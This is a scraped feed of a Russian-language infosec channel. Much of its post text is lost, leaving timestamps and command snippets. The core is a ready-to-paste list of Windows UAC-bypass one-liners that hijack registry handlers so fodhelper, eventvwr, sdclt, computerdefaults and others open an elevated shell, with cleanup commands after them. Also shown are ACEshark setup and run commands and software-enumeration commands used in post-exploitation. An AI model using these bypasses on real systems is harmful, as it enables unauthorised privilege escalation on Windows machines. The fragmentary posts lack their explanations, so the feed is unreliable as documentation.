https://habr.com/ru/companies/pt/articles/834486/
Fsecurity | HH - это канал, посвященный информационной безопасности. Здесь вы найдете актуальные новости, советы по защите данных, аналитику уязвимостей и многое другое. Канал создан командой hellohackingteam, которая призвана помогать пользователям защищаться от киберугроз. Если вы хотите быть в курсе последних тенденций в сфере ИБ, то этот канал - для вас. Подписывайтесь, делитесь полезной информацией с друзьями и не забудьте заглянуть на наш Discord, где вы сможете задать вопросы экспертам по безопасности и обсудить актуальные темы. Присоединяйтесь к нашему сообществу уже сегодня!
14 Jan, 16:07
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe
reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe
reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe
cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f
14 Jan, 12:29
14 Jan, 10:22
13 Jan, 16:08
13 Jan, 14:10
13 Jan, 12:18
git clone https://github.com/t3l3machus/ACEshark
cd ACEshark
pip3 install -r requirements.txt
sudo apt-get install xclip
sudo apt-get install xselect
python3 ./ACEshark.py -s 10.10.1.10 -i
# Полученный скрипт выполняем на удаляемом хосте
13 Jan, 08:06
12 Jan, 18:08
27 Dec, 18:13
27 Dec, 10:07
27 Dec, 10:05
27 Dec, 06:04
26 Dec, 17:21
24 Dec, 18:16
24 Dec, 16:15
NT AUTHORITY\SYSTEM
. # Извлечение из реестра
Get-ChildItem "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | Get-ItemProperty | Where-Object {$_.DisplayName -ne $null} | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
# wmi
wmic product get name,version,vendor
# Seatbelt
.\SeatBelt.exe InstalledProducts
24 Dec, 14:15
24 Dec, 12:00
23 Dec, 20:15
23 Dec, 18:09
23 Dec, 10:07
23 Dec, 08:01
22 Dec, 20:03
22 Dec, 18:13
Settings
> Network
> HTTP
> Streaming responses
, чтобы исправить это 🔍23 Nov, 20:04
needrestart
(который стартует, например, при apt upgrade
), патчу всего три дня, и он еще не добавлен во все репы Debian)23 Nov, 14:21
23 Nov, 12:11
22 Nov, 16:13
22 Nov, 16:13
22 Nov, 08:14
21 Nov, 18:04